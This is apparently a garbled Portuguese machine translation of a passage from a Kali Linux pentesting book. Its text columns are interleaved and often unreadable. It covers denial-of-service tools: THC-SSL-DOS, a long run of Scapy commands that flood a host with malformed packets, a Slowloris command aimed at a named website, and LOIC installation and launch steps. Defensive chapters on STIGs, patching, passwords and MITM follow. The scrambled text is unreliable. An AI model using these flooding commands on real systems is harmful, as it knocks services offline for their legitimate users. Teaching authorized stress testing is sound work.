de banda, e assim por diante), a diante. servidor do cliente. THC-SSL-DOS erro:
configurao Ataques Camada de Aplicao: Ele explora este Uma vez THC-SSL-DOS executado,
informao (ou seja, remover tabelas aproveita o trfego legtimo para travar propriedade assimtrica por voc ver alguns palavreado
de rotas), informaes sobre o estado a web sobrecarregar o servidor at que ele engraado informando que
(o restabelecimento sesso TCP), ou servio. Os exemplos incluem ataques incapaz de fornecer qualquer iniciar o processo de aperto de mo e
qualquer coisa que possa prejudicar o de dia zero, a explorao da servio a usurios legtimos. O ataque que est sendo explorado. Na imagem
funcionamento do sistema. vulnerabilidade, explora o recurso de re-negociao seguinte,
A diferena entre um e DoS Negao e assim por diante. segura SSL vamos mostrar um site que no
de servio distribuda Sesso de Exausto: Abusando para disparar milhares de alavancar SSL, portanto mostrando
(DDoS) que um ataque de negao limitaes sesso, estabelecendo renegociaes usando uma nica erros de conexo.
de servio envolve uma mquina repetidamente conexo TCP. Isto conhecido A segunda imagem mostra os apertos
enquanto um DDoS mas no fechando novas sesses como SSL-Exausto ataque. A de mo bem-sucedidas, o que
ataque envolve muitos. DDoS est com o objetivo de consumir recursos. vantagem desta abordagem que a acabar
fora do escopo deste texto. transformao DoS o alvo. Lembre-se, voc s deve
[235] capacidade de apertos de mo SSL tentar isso em IPs e sites voc
muito superior no lado do cliente, o tem permisso para testar. Estes
Ataques na Web Kali Linux contm vrias ferramentas que significa que um comum ataques podem danificar severamente
Existem quatro categorias principais de explorao de vulnerabilidade laptop atravs de uma conexo de um web site ou
de ataque DoS / DDoS: abordados no anterior rede mdia pode desafiar um servidor aplicao web:
captulos que podem ser usados para de aplicativos web. [237]
Desconto Baseado Ataques: Trata-se a camada de aplicao ataques DoS Esta uma vulnerabilidade conhecida,
de enchentes, inundaes UDP ICMP, como Metasploit. e no existe soluo real para Ataques na Web
e outros Alm disso, Captulo 3 cobria uma remediar este a partir do Scapy
ferramenta popular scapy Protocolo escrita deste texto.
[236]
Uma das ferramentas mais populares em nosso servidor Kali para o enviar (IP (dst = "10.0.0.1") / TCP iface = "eth0", count = 2000)
DoS scapy. Scapy uma ferramenta endereo de destino 10.0.0.1. Alm (flags = 0x0ff), iface = "eth0", count = [239]
de manipulao de pacotes para disso, estamos enviando 2000)
redes de computadores, escrito em o alvo de um tempo para viver valor FIN nico conjunto Ataques na Web
Python por Philippe Biondi. Scapy de 0. Isso muito bonito impossvel enviar (IP (dst = "10.0.0.1") / TCP L2 Comprimento >> IP Comprimento
pode forjar ou decodificar de um TCP (flags = "F"), iface = "eth0", count = enviar (IP (dst = "10.0.0.1", len = 32) /
pacotes, envi-los no fio, captur-los, ponto de vista. Essencialmente, 2000) Raw (load = "bla-bla-bla-bla-bla-bla-
e as solicitaes e as respostas de estamos tentando confundir o servidor Length> L2 Comprimento bla-bla "), iface =" eth0 ", count =
jogo. Alm disso, web com um mau TTL enviar (IP (dst = "10.0.0.1", src = 2000)
ele pode lidar com tarefas como valor. Atacantes na vida real mandar "10.20.30.40", o DIH = 15L) / TCP enviar (IP (dst = "10.0.0.1", len = 32) /
digitalizao, tracerouting, sondagem, milhes desses pacotes. Deve notar- (dport = "www"), UDP (dport = 80, len = 48) / Raw (load
testes de unidade, ataques, e se que um iface = "eth0", count = 2000) =
a descoberta de rede. sistema sob as circunstncias corretas Comprimento Header Too Short "Bla-bla-bla-bla-bla-bla-bla-bla"), iface
Um truque comum manipular pode falhar ou se tornar corruptos de enviar (IP (dst = "10.0.0.1", src = = "eth0", count = 2000)
pacotes TCP do Kali e envi-lo via uma nica m "10.20.30.40", o DIH = 2L) / TCP enviar (IP (dst = "10.0.0.1", len = 32) /
scapy. ou pacote malformado. Podemos (dport = "www"), ICMP () / Raw (load = "bla-bla-bla-bla-
Para iniciar scapy, tipo scapy na ajustar a contagem ou outros iface = "eth0", count = 2000) bla-bla-bla-bla "), iface =" eth0 ", count
janela do terminal. Uma vez scapy foi parmetros que podem precisar de ICMP Flood = 2000)
lanado, para o nosso ataque: enviar (IP (dst = "10.0.0.1") / ICMP (), No L4
digitar sintaxe de comando: Aqui esto alguns outros cenrios de iface = "eth0", count = 2000) enviar (IP (dst = "10.0.0.1", src =
Nesta tela a seguir, vamos usar scapy ataque populares usados por scapy: IP erro de checksum "10.20.30.40"), iface = "eth0," count =
para enviar TCP malformado Bad IP verso enviar (IP (dst = "10.0.0.1", src = 2000)
pacotes para o nosso servidor de enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / SYN && FIN Set
teste. Neste caso de uso, o nosso "10.20.30.40", verso = 0) / TCP (dport = "www"), iface = "eth0", enviar (IP (dst = "10.0.0.1") / TCP
servidor de teste 10.0.0.1. Este pode TCP (dport = "www"), iface = "eth0", count = 2000) (flags = "FS"), iface = "eth0", count =
ser um count = 2000) IP Fragment 2000)
roteador ou um servidor web. [238] enviar (IP (dst = "10.0.0.1", src = TCP Header Length> L2 Comprimento
Tambm, vamos especificar o nmero "10.20.30.40", frag = 1) / TCP (dport = enviar (IP (dst = "10.0.0.1", src =
de pacotes que sero Captulo 6 "www"), "10.20.30.40") /
enviar para o nosso destino. Neste Bad TCP checksum iface = "eth0", count = 2000) TCP (dport = "www", dataofs = 15L),
caso estamos enviando 2000 pacotes enviar (IP (dst = "10.0.0.1") / TCP IP Comprimento> L2 Comprimento iface = "eth0", count = 2000)
usando o comando: (chksum = 0x5555), iface = "eth0", enviar (IP (dst = "10.0.0.1", src = TCP Header Length Too Short
enviar (IP (dst = "10.0.0.1", ttl = 0) / count = 2000) "10.20.30.40", o DIH = 5L, len = 80) / (comprimento <5)
TCP (), iface = "eth0", count = 2000) Bad TCP Flags (tudo esclarecido e TCP (dport = "www"), iface = "eth0", enviar (IP (dst = "10.0.0.1", src =
Na linha de comando anterior, SEQ # == 0) count = 2000) "10.20.30.40") /
estamos enviando 2000 pacotes a enviar (IP (dst = "10.0.0.1") / TCP Fonte endereo IP == Destination TCP (dport = "www", dataofs = 1 L),
partir de nossa eth0 interface (flags = "", seq = 555), iface = "eth0", Address iface = "eth0", count = 2000)
count = 2000) enviar (IP (dst = "10.0.0.1", src = SlowLoris
Bandeiras Bad TCP (All Flags Set) "10.0.0.1") / TCP (dport = "www"), [240]
http://ckers.org/slowloris permite que um usurio para fazer loic.sh chmod 777
Captulo 6 Para executar SlowLoris, baixe o . Pl testes de estresse diretamente de um O ltimo passo executar o script
SlowLoris um cliente HTTP baixa script e abrir um terminal de comando. navegador web. usando o seguinte comando:
largura de banda que pode emitir Ir O software foi usado famosa por . / Loic.sh instalar
ataques DoS. O que faz para a pasta com o script e digite: Anonymous para ajud-los a facilitar [243]
SlowLoris nico o seu mtodo de perl slowloris.pl ataques DDoS
atacar um alvo sem usar inundaes Isso far com que o ecr principal. contra vrios sites, incluindo algumas Ataques na Web
comum Para executar SlowLoris em um alvo, entidades pblicas muito conhecidas. Se voc no receber quaisquer
tcnicas. SlowLoris mantm conexes digite o Alguns mensagens de erro da execuo do
abertas atravs do envio de mesmo comando seguido de -Dns e argumentao jurdica foram feitos script, ento voc est pronto para
solicitaes HTTP parciais. Ele seu alvo. Por exemplo, para atacar que LOIC semelhante a ir a um site atualizar loic. Para atualizar, use o
continua a enviar centenas de www.thesecurityblogger.com, Digite: vrios seguinte comando:
cabealhos subseqentes em perl slowloris.pl-dns mil vezes, no entanto, alguns grupos . / Loic / update sh
intervalos regulares para manter thesecurityblogger.com de policiais americanos tratam o uso Finalmente, hora de lanar LOIC.
soquetes de fechamento. Este [241] de Voc pode fazer isso usando o
comportamento vai sobrecarregar os LOIC como uma violao da lei de seguinte comando:
recursos do alvo, fazendo com que Ataques na Web segurana de computador e fraude. . / Loic.sh prazo
o incapaz de responder ao trfego Voc vai ver SlowLoris consumir [242] Usando LOIC simples. Voc pode
legtimo. Sites de alto trfego pode soquetes disponveis, o que acabar selecionar se voc gostaria de usar o
levar um longo tempo por levar para baixo Captulo 6 modo manual
para liberar soquetes disponveis, seu alvo: Para instalar o LOIC, Abra uma janela ou Modo de IRC. Vamos escolher o
porque os outros usurios devem Se SlowLoris capaz de fazer a sua de terminal e digite: modo manual para o seguinte
terminar seus pedidos antes magia, o seu alvo ficaro apt-get update exemplo.
as tomadas se tornam disponveis indisponveis: aptitude install git-core monodevelop Em seguida, voc pode escolher o
para SlowLoris para consumir. No DoS exemplo ataque apt-get install mono-gmcs URL ou endereo IP que pretende
entanto, SlowLoris www.thesecurityblogger.com (Por Uma vez que seja completa, v para o inundar. Vamos usar o IP
acabar por inundar todos os favor, no diretrio desktop usando cd / Desktop endereo 127.0.0.1 por exemplo, o
soquetes disponveis, matando servio teste contra este site) e criar um seguinte. LOIC oferece opes de
ao site da vtima. Low Orbit Ion Canho pasta chamada loic usando o seguinte ataque, se voc gosta
SlowLoris tira proveito de servidores Low Orbit Ion Canho (LOIC) uma comando: para modificar as configuraes de
que utilizam processamento de rosca, ferramenta de teste de estresse de mkdir loic TCP ou UDP.
o que significa rede, o que significa que projetado Navegue at a pasta usando cd / loic [244]
vulnervel a limitar a quantidade de para testar a quantidade de trfego de e digite o seguinte comando:
rosca permitida. Exemplos incluem um alvo pode manipular para o wget Captulo 6
1.x Apache, 2.x, dhttpd, GoAhead, e planejamento de expectativas futuras https://raw.github.com/nicolargo/loicins Quando voc estiver pronto para
assim por diante. de recursos. taller/ lanar o seu ataque, pressione o
No SlowLoris no vem instalado no O software tem inspirado outros master / loic.sh boto de IMMA CHARGIN
Kali Linux. Voc pode baixar a partir softwares similares, tais como Em seguida, dar permisses para o
de SlowLoris JavaScript, LOIC, que arquivo de script usando o comando:
MAH LAZER. LOIC mostrar o ataque a Internet. Para que isso funcione, medir o desempenho do seu cdigo reao e ponto de vista forense.
est em andamento. Clique no Pare voc precisa ter acesso e modificar as sob coao. Siege oferece multi- Inundator tambm pode ser usado
de Inundaes entradas DNS em um thread para testar a eficcia
boto para parar o ataque: nico servidor ou veneno real DNS Testes de carga HTTP e do sistema de alerta de suas
Outras ferramentas para que o trfego chega ao servidor benchmarking por bater um servidor ferramentas de relatrios de
Kali Linux oferece muitas ferramentas Kali Linux. O web com um configurvel segurana, como SIEM e IDS / IPS.
que podem ser teis para ataques DNSChef ferramenta fcil de usar, nmero de concorrentes, os usurios TCPReplay
baseados na web. Aqui esto no entanto, o desafio o mtodo de simulados. Siege oferece uma TCPReplay utiliza trfego previamente
algumas ferramentas adicionais ataque de DNS para regresso, simulao Internet capturado em libpcap formato para
disponveis em Kali Linux que no direcionar o trfego para Kali Linux. e modos de fora bruta. testar uma variedade de
foram cobertos e poderia SniffJoke Voc pode encontrar sob cerco Teste dispositivos de rede. TCPReplay pode
ser usado para testes de penetrao SniffJoke lida com a sua conexo TCP de Estresse |Testes de stress de rede classificar o trfego como cliente ou
remoto. transparente, proporcionando atraso, |Siege: servidor, reescrita Camada
DNSCHEF modificando Para executar Siege, digite o seguinte 2, 3 e 4 cabealhos e repetir o trfego
DNSChef um proxy DNS para e injetando pacotes falsos dentro de comando: de volta para a rede, bem como
Penetration Testers e malware sua transmisso. Este processo faz cerco [opes] <target URL> atravs de
analistas. Um DNS com que seja extremamente A imagem seguinte mostra a outros dispositivos, tais como
proxy tambm conhecida como "DNS difceis para uma tecnologia passiva execuo cerco contra switches, roteadores, firewalls e IDS /
Falso" uma ferramenta utilizada para escutas telefnicas como um IDS / www.thesecurityblogger. IPS. TCPReplay apoios
o trfego de rede aplicao IPS ou sniffer para com. A contagem de usurio padro modos NIC simples e dupla para
anlise e outros casos de uso. Domain interpretar correctamente o trfego. 15, como mostrado na imagem. testar tanto sniffing e dispositivos
Name System (DNS) uma Isto feito atravs da explorao do Quando voc parar o embutidos.
nomenclatura distribudo que se presume registada Testes de Siege, a ferramenta fornece Basicamente, TCPReplay pode
sistema para computadores, servios por um sniffer e que transmitido pelo um teste de estresse ps-relatrio da capturar o trfego entre o cliente eo
ou qualquer recurso conectado cliente, fazendo com que este seguinte forma: servidor, e reproduzi-lo
Internet ou privada inconsistente para o [247] qualquer ponto da rede.
rede. Fornecer endereos DNS falsos algoritmo de remontagem pacote. Os [248]
podem redirecionar o trfego para prximos dois diagramas de mostrar o Ataques na Web
outros locais desejados. trfego de escutas telefnicas Inundator Captulo 6
[245] entre dois usurios sem e com Inundator uma ferramenta que foge Resumo
SniffJoke. Sistemas de Intruso deteco (IDS) e Este captulo termina revendo vrios
Ataques na Web [246] Intrusion mtodos disponveis em Kali Linux 1.0
Por exemplo, uma procurao DNS Sistemas de Preveno (IPS) por que
pode ser utilizada para pedidos de Captulo 6 inundar seus arquivos de log. O poderia ser usado para realizar testes
falsos badguy.com apontar Cerco conceito que voc pode de penetrao contra servidores de
uma mquina local para a resciso ou Siege um HTTP / HTTPS utilitrio quer inundar um alvo com falsos aplicativos web. Em
interceptao em vez de uma srie de testes de estresse projetado para positivos, assim voc pode se Neste ponto, os leitores devem saber
verdade em algum lugar desenvolvedores web esconder de um ataque real a partir de como pesquisar um alvo, identificar as
um vulnerabilidades
nesse alvo, bem como todas as O prximo captulo vai mudar de do conhecimento comum que Kali Linux uma ferramenta principal
interaes associadas com host e marcha, olhando para como se existem pessoas ms sistemas de teste de penetrao que podem ser
clientes, explorar defender de aplicaes web ataque sobre a utilizados para identificar onde
vulnerabilidades, e servios de utilizando ferramentas disponveis no Internet, independentemente da sistemas so vulnerveis a ataques.
interrupo, se desejar. Este texto Kali Linux 1.0. natureza do negcio. Como uma Ao invs de atacar um alvo,
uma breve viso geral das [249] medida contra defensiva, recomendamos
ferramentas organizaes depositam sua Penetrao Teste seus prprios ativos
disponvel em Kali Linux, no entanto, Contramedidas defensivas confiana em solues para defesa de rede para identificar as
existem muitas outras ferramentas At este captulo, ns cobrimos como contra essas ameaas cibernticas. O vulnerabilidades antes de um
alm Kali Linux usar Kali Linux para comprometer as problema com essa estratgia o indivduo mal-intencionado bate-lhe a
que devem ser includos em seu metas. vendedor no vtima de um ataque e ele. Para citar Sun Tzu a partir de A
arsenal Teste de Invaso. Kali Linux Agora hora de trocar as marchas e no Arte da Guerra:
oferece uma srie se tornar o zagueiro com o objetivo de absorver os danos de um incidente "Se voc conhece o inimigo e conhece
de valor, com conjuntos de evitar ciberntico. Os vendedores vo a si mesmo, voc no precisa temer o
ferramentas nativas, no entanto, as sendo comprometida por mtodos que oferecer proteo, no entanto, resultado de um
melhores ferramentas de tm demonstrado neste livro, bem eles no podem ser responsveis por cem batalhas. Se voc se conhece
alavancagem Penetrao Testers como qualquer coisa fora do controle do seu mas no o inimigo, para cada vitria
alm de Kali, tais como ataques do outras formas de ataque. Defendendo produto. Tudo o que precisamos ganha
tipo Zero Day baseados em scripts e um recurso voltado para a Internet uma falta de atualizao, erro de voc tambm vai sofrer uma derrota.
utilitrios personalizados. Ns extremamente difcil, configurao, ou milhes de situaes Se voc no conhece nem o inimigo
recomendar pesquisando e testando com base no que est sendo exposta que podem causar uma nem a si mesmo, voc vai
vrias ferramentas para mtodos de a todo o mundo atravs de acesso brecha para que o vendedor no ser sucumbir em todas as batalhas "
ataque abordados neste pblico, misturado com o responsvel. Alm disso, muitas Ns acreditamos que os mesmos
texto para crescer a sua experincia operaes exigncia de no ser capaz organizaes de alavancagem conceitos fundamentais so
como um verificador da penetrao de impactar o servio a usurios solues de vrios fornecedores que verdadeiras; usar Kali Linux para
profissional. confiveis a um custo no compartilham de inteligncia de conhecer a si mesmo,
Este captulo concentra na de segurana. absolutamente crtico segurana, fazendo o possvel para e conhecer a sua fraqueza.
identificao e explorao de para incluir a segurana em todo o responsabilidade a ser passado para A vantagem que voc tem que voc
vulnerabilidades remotamente como ciclo de vida de trs e para frente entre os sabe que est acontecendo, voc
relacionada a ataques baseados na concepo at a resciso do pblico fornecedores. Por estas e outras pode usar e extrema
Internet. Cobrimos ataques de enfrenta qualquer coisa, em vez de razes, medidas sem a preocupao de
explorao do navegador, Proxy considerar a segurana recomendamos aos clientes tomar acionar alarmes. Normalmente, os
ataques, e colheita de senha. como uma reflexo tardia. Isto no s posse a responsabilidade de proteger hackers no vai arriscar
Concluiu-se com os mtodos para ir reduzir o risco de ameaas contra os ativos por expondo-se, reduzindo as suas
interromper servios o servio, sistemas de endurecimento das opes para o ataque. Discrio
como um meio de aplicaes web de mas tambm provvel ser menos ameaas. requer pacincia,
teste de estresse, bem como caro para remediar, no caso de um toque mnimo para o alvo, e muito
identificar o quo vulnervel incidente ciberntico. Contramedidas defensivas planejamento. at voc para
alvos so a ataques DoS. capitalizar sobre o seu
capacidade de investir tempo e (PCI DSS). Ambientes de sade deve Vamos dar uma olhada na linha de
recursos adequada em segurana atender Seguro de Sade base de segurana dos Estados
antes que algum investe Portabilidade e Unidos de qualquer coisa o acesso a
mais em atravess-lo. Um ditado Responsabilidade normas (HIPAA). uma
comum entre os autores deste livro Preto, branco, cinza ou abordagem Mandatos comuns, como estes so rede controlada pelo governo.
"99 por cento chapu? cobertos Sua linha de base para a segurana
seguro um inseguro 100 por cento ". Teste uma cpia ou o sistema real? em Captulo 8, Relatrio Executivo deve ser o nvel mnimo absoluto de
Este captulo ir fornecer diferentes Possveis riscos de Teste de Invaso? teste de penetrao, so segurana
mtodos de utilizao de Kali Linux Quem deve ser informado? impulsionadores de negcios utilizado em seu ambiente. A melhor
para auditar o seu web [252] populares para prtica assegurar sistemas alm do
aplicativos para vulnerabilidades mostrando valor para os servios de linha de base, porque as linhas de
comuns, bem como outras melhores Captulo 7 testes de penetrao. base de segurana como mais
prticas para o endurecimento Fora dos mandatos, um bom ponto de documentados so limitados, devido
sua rede. Ns vamos cobrir as linhas partida para o estabelecimento de a data de publicao, a influncia dos
de base de segurana, gerenciamento Voc est testando deteco e uma linha de base para a segurana partidos de financiamento, e outros
de patches, password resposta a ameaas ou focando est analisando como outras agncias elementos.
polticas, e defender-se contra os identificao de vulnerabilidades? de proteger seus sistemas. Como [253]
mtodos de ataque, cobertas nos So todos os padres de consultores de segurana para
captulos anteriores. conformidade a ser considerada? Clientes americanos, identificamos Contramedidas defensivas
Este captulo tambm inclui uma Vejamos que estabelece um plano como o governo dos Estados Unidos STIG
seo focada em usar Kali Linux em para validar a nossa segurana. assegura sensvel AGuia de Segurana Tcnico de
um forense Primeiro precisamos informao como um exemplo para a Implementao (STIG) uma
investigao. Forensics importante conhecer a nossa linha de base para a segurana da linha de base. A maioria metodologia para
depois de identificar que sua aplicao segurana, por isso sabemos o que das organizaes norte-americanas instalao e manuteno do software
web ou para validar contra. seria de computador seguro e padronizado
outros ativos ter sido comprometida, Segurana da linha de base estar interessado em ter padres de hardware. Este termo foi cunhado pelo
para evitar futuras impacto negativo. Uma pergunta comum feita por segurana semelhantes como a Casa Agncia de Defesa de Sistemas de
Testando suas defesas especialistas do setor o que deve Branca. Esta mesma Informao
Como explicado na introduo, a ser o mnimo conceito pode ser aplicado a outros (DISA), que cria documentos de
melhor abordagem para endurecer a nvel aceitvel de segurana. Muitas padres de TI pas, a segurana configurao em apoio da
sua defesa organizaes devem estar em organismo especfico Organizao das Naes
atacando seus controles de segurana conformidade com melhores prticas, ou controles Unidos Departamento da defesa
existentes, com o objetivo de mandatos especificados por sua militares recomendadas de segurana. (DOD). As diretrizes de
identificar fraqueza. indstria e do governo. Qualquer H tambm as melhores prticas implementao incluem
Alguns conceitos-chave a considerar sistema de aceitar para os padres de segurana processos administrativos
ao desenvolver uma estratgia para pagamentos devem aderir ao Payment publicados a partir de organizaes recomendadas e controles de
testar seu ciberntico Card Industry Data Security Standard formadas por fornecedores e indstria segurana utilizados durante o
defesas de segurana so os lderes, como a Organizao ciclo de vida do ativo.
seguintes: Internacional de Normalizao (ISO).
Um exemplo onde Stigs seria de Existem muitos outros recursos e reagindo aos sistemas identificados
benefcio est na configurao de uma disponveis para encontrar segurana Implantar como
rea de trabalho modelos de normalizao. Exemplos Patches vulnervel. Como explicado em
computador. A maioria dos sistemas so o Center for Internet Atualizar Captulo 1, Teste de Invaso e
operacionais no so inerentemente Segurana (CIS) e Cisco Protection Vulnerabilidade configurao, sendo
seguros, deixando-os vulnerveis Network Foundation (NFP). Detalhes vulnervel no significa
para os criminosos. A STIG descreve O gerenciamento de patches a partir de necessariamente que h um risco a
como minimizar ataques baseados na Com ataques direcionados e Vendedores menos que a vulnerabilidade
rede e prevenir vulnerabilidades de dia zero, Digitalizar o validada atravs da explorao,
o acesso ao sistema quando o invasor reduzindo a janela de tempo Rede durante um teste de penetrao ou
est presente no dispositivo. Stigs entre o momento em que uma Identificar outro mtodo.
tambm descrevem vulnerabilidade divulgada e os Vulnervel Protegendo a vulnerabilidade pode
processos de manuteno, tais como atacantes desenvolver um exploit, Sistemas simplesmente exigir um patch ou
atualizaes de software e patches tornando-se mais compete gerentes Gerenciamento de patches apenas atualizao, no entanto,
vulnerabilidade. de segurana de entender os ativos um aspecto do ciclo de vida maior algumas vulnerabilidades podem
Stigs so grandes diretrizes para em sua vulnerabilidade. O primeiro exigir mais investimento em tempo e
proteger os sistemas operacionais, Ambiente de TI, e os nveis de passo identificar as vulnerabilidades, trabalho para remediar.
dispositivos de rede, e correo desses sistemas. o que pode ser feito atravs de Clculo do risco associado ao
aplicaes. Voc pode baixar Gerenciamento de patches um atualizaes do fornecedor ou investimento para remediar entra em
diretrizes STIG de processo contnuo e s pode ser bem servios que vo da verificao jogo
http://www.stigviewer. sucedido se houver um mtodo para peridica de testes de penetrao de para estas situaes.
com.br / Stigs. Voc vai encontrar identificar quando hardcore. L O passo final no gerenciamento de
documentos STIG contm guias um patch est disponvel, priorizar deve ser uma poltica que explica patches est programando o patch
passo-a-passo para o endurecimento quando implementar o patch, valid-lo como muitas vezes diferentes nveis que se refere
uma variedade de sistemas, incluindo sobre de exames so realizados como crtica a vulnerabilidade a
servidores web. Alm disso, as o cumprimento do negcio, e como assim como quem o responsvel operaes comerciais. Esta uma
diretrizes STIG so um ponto de reagir quando um patch no est para analisar as ameaas que so chave, como muitos
partida disponvel para um conhecido encontrados. Um bom ponto de sistemas comprometidos poderia ter
apontam para a configurao de vulnerabilidade. Isso vale tambm partida sido salvo se fossem corrigidas antes
sistemas para atender a vrios para aplicaes dentro dos sistemas e para estabelecer uma linha de base de ser
padres de conformidade software, tais para a freqncia de varredura de identificado por um partido malicioso.
regulamentar. como plugins. vulnerabilidades est revendo o que Ns encontramos muitos dos nossos
Para Estados Unidos funcionrios [254] padres de conformidade clientes tm manuteno
federais, Stigs so necessrios para regulamentar que deve seguir, como janelas programadas em uma base
os sistemas em redes Captulo 7 muitos incluem lngua em torno de mensal ou mais para o gerenciamento
controlado pelo Departamento de Gerar varredura de vulnerabilidades internas de patches, que
Defesa e outras organizaes Estado e externas. deixa uma grande janela de tempo
governamentais. Relatrios O segundo passo para o para serem expostos, no caso de um
Baixar gerenciamento de patches est sistema se torna
vulnervel a ataques. A melhor prtica para simplificar as senhas de qualquer 14.800, de 16 caracteres senhas hash Os ataques do lado do cliente deste
a atribuio de um especialista maneira, possivelmente usando criptograficamente de uma lista livro. Ferramentas sugeridas so John
Information Assurance caracteres repetidos, previsvel de 16.449. Este um caso especial no the Ripper, Johnny,
da responsabilidade do clculo do comportamento, como o uso de 12345 momento da publicao, no entanto, Hashcat, oclHashcat, e Ophcrack.
risco associado com sistemas para estender o comprimento de uma ser o campo de batalha comum para Triturao e Hashcat pode tambm
identificados como senha, ou outros meios. hackers futuras. Considere o ser usado para
vulnerveis, bem como ter a Os usurios tambm normalmente comprimento recomendado de uma gerar listas de senhas para que
autoridade para janelas de no alterar senhas a menos que senha de um alvo em movimento. possam comprovar a fora de sua
manuteno quando um trunfo forado por um sistema. Para estes Os autores deste livro so fs de poltica de senha.
ameaa atinge um determinado nvel razes, uma poltica de senha deve gerador de senha por Steve Gibson, Existem sites disponveis, como
de risco para as operaes seguir as seguintes orientaes: como um seguro Crackstation, que oferecem pr-
comerciais. mtodo de gerao de senhas gerada
[255] aleatrias. O gerador de seguro senha listas de senhas populares. Voc pode
aleatria usar estas listas para testar a fora da
Contramedidas defensivas por Steve Gibson pode ser encontrado suas senhas e polticas.
Gerenciamento de patches uma das no Centro de Pesquisa Gibson em: Espelhe o seu ambiente
melhores estratgias de defesa para https://www.grc.com/ Antes de testar um sistema contra
evitar muitos dos J possui uma validade que est em passwords.htm. uma configurao de segurana
ameaas apresentadas neste livro. 90 dias [256] recomendada, a verificao de
Certifique-se de rever como a sua No permitir que as ltimas cinco vulnerabilidades, ou validao de um
organizao senhas como substitutos Captulo 7 sistema vulnervel atravs da
lida com o gerenciamento de patches Aplicar um comprimento de pelo Muitos sites e aplicaes web so explorao, pode
periodicamente para evitar ser vtima menos 12 caracteres comprometidas, porque web fazer sentido para clonar o sistema
de expor uma No limitar quaisquer caracteres, desenvolvedores implementados para fins de teste, em vez de testar o
sistema vulnervel que poderia ter como caracteres especiais protocolos de segurana pobres. Os real
sido assegurada. Isto deve aplicar-se Mandato pelo menos uma letra desenvolvedores da Web sistema. As melhores prticas so
a todos gerenciados maiscula, nmero e caractere deve usar criptografia forte para replicar tudo, desde o hardware de
ativos, incluindo servidores e especial armazenar senhas de usurios e hospedagem na web
aplicaes web. Avisar ou negar dgitos repetio dados. aplicao a todo o contedo, porque
As diretivas de senha como 12345 ou asdfg para evitar As senhas devem implementar pode existir vulnerabilidades em todas
Em geral, ter uma poltica que controla ataques de fora bruta hashing e salga tcnicas para as camadas de tecnologia.
os resultados possveis pode impactar Processamento do computador est promover Testando um ambiente clonado vai
negativamente constantemente a melhorar, o que mitigar os riscos em dados roubados dar a liberdade Tester Penetrao
a fora de palavras-passe. significa 12 caracteres ou perdidos. para executar
Independentemente da poltica, os senhas no ser forte no futuro Voc pode avaliar a fora das senhas qualquer grau de ataque, evitando
usurios tero pela natureza humana, prximo. Um artigo recente usadas em sua alavancagem sistemas impacto negativo s operaes.
tente publicado na primavera de 2013, ferramentas de quebra de senha Embora a maioria
afirmou uma equipe de hackers abordados Captulo 3, os ataques lado
rachado mais de do servidor, e Captulo 4,
as pessoas no podem espelhar o No momento da escrita, HTTack j Aqui esto mais algumas ferramentas acessada usando HTTPS ou
ambiente exato, geralmente possvel no vem pr-instalado com Kali. Para de clonagem de sites disponveis na conexes seguras HTTP. Verificando
a criao de um virtuais instalar Kali Linux. Mais uma vez, HTTPS no to fcil
ambiente com a mesma HTTack, abrir um Terminal janela e essas ferramentas no ir replicar o como a procura de um pouco de barra
funcionalidade. tipo apt-get install httrack. Uma vez contedo dinmico, nem iro replicar de endereos verde com um smbolo
HTTrack a instalao estiver concluda, voc site de bloqueio, porque os atacantes
HTTrack um utilitrio de navegador pode iniciar HTTrack, abra um middleware, tais como bancos de podem
offline livre. HTTrack permite que voc Terminal e tipo httrack. dados. Portanto, eles no podem ser servir certificados das vtimas para
baixe um site Voc ser solicitado a dar um nome apropriados em todos fazer parecer que a sesso segura.
a partir da Internet para um diretrio de projeto, o caminho para instalar o Ambientes de teste de penetrao. [259]
local, construir todos os diretrios, site (o padro
captura de HTML, imagens, root / sites /) E URLs para copiar. Contramedidas defensivas
e outros arquivos a partir do servidor e HTTrack d algumas opes para WebCopier: uma ferramenta que Para testar adequadamente uma
armazenar em seu computador. Voc copiar o seu clona um site para avaliao off-line, sesso HTTP, examinar o certificado e
pode navegar na clonado alvo (s), conforme mostrado na tela a tais olhar para o certificado
link do site-to-link, bem como test-lo seguir. Algumas perguntas opcionais como testes de penetrao. autoridade. Este esforo adicional
em busca de vulnerabilidades. adicionais w3mir: uma cpia HTTP para todos desencoraja muitos usurios de
HHTrack extremamente est definindo wildcards e nvel os fins e ferramenta de espelhamento. verificar um seguro
ferramenta simples para trabalhar com recursivo. Ns selecionamos a opo A principal sesso, o que torna este mtodo de
sites bsicos. No vai replicar o 2. Depois de responder a foco de w3mir criar e manter uma ataque muito eficaz.
contedo dinmico, nem perguntas, selecione Yclonar o seu cpia navegvel de um, ou A figura anterior mostra um certificado
ser que vai replicar site middleware, alvo (s). vrios, sites WWW remotas. SSL para o Gmail foi emitida pelo
tais como bancos de dados. Por isso, HTTrack vai comear a clonar o seu Man-in-the-middle defesa Google
pode no ser alvo e todos os links associados. Pode Ataques man-in-the-middle so Autoridade Internet. Isto soa muito
apropriada em todos os ambientes de demorar um pouco para difceis de proteger contra. O ataque bem, mas quem o Google Internet
testes de penetrao. concludo, dependendo do tamanho acontece fora Autoridade?
[257] do seu alvo. A prxima imagem de ambiente controlado da vtima e, Posso confiar neles? Ser que
mostra HTTrack quando executado corretamente, no realmente o Google? Neste exemplo,
Contramedidas defensivas clonagem deixa um eu tenho um outro certificado
Para testar todos os aspectos de um www.thesecurityblogger.com. assinatura bvio que alertar as vtimas autoridade apresentada por cima da
site, voc ter que usar outro software [258] envolvidas. MITM tipicamente o Internet Autoridade Google chamado
para primeiro passo de Equifax seguro
clonar um alvo. Esse software deve Captulo 7 um ataque mais sinistra como tira Autoridade de Certificao. Equifax
incluir a captura de middleware e Navegue at a pasta que voc SSL. Uma maneira comum de se tem uma srie de verificaes e
contedo dinmico, bem como, especificou para salvar as metas proteger contra MITM balanos antes de emitir
possivelmente, exigir acesso de clonados para iniciar o seu teste. garantir sites usam SSL / TLS 3.0. certificado para garantir um negcio
administrador Outras ferramentas de clonagem Em outras palavras, certifique-se os vlido. Verificando que Equifax gerou
direitos sobre o alvo. sites so este
certificado que me faz sentir confiante que inclui um nome de usurio e Controle de Segurana (MACsec) e verso do site criptografado, para uma
de que posso confiar neste certificado. senha, juntamente com algumas 802.1x. Estas abordagens usar redes verso criptografada do site. Quando
Em ltima anlise, HTTPS depende outras formas de avanadas voc navega
do conceito de confiana. Para ser autenticao, tal como OTP (De uma para fornecer autenticao de origem, para http://www.facebook.com ou
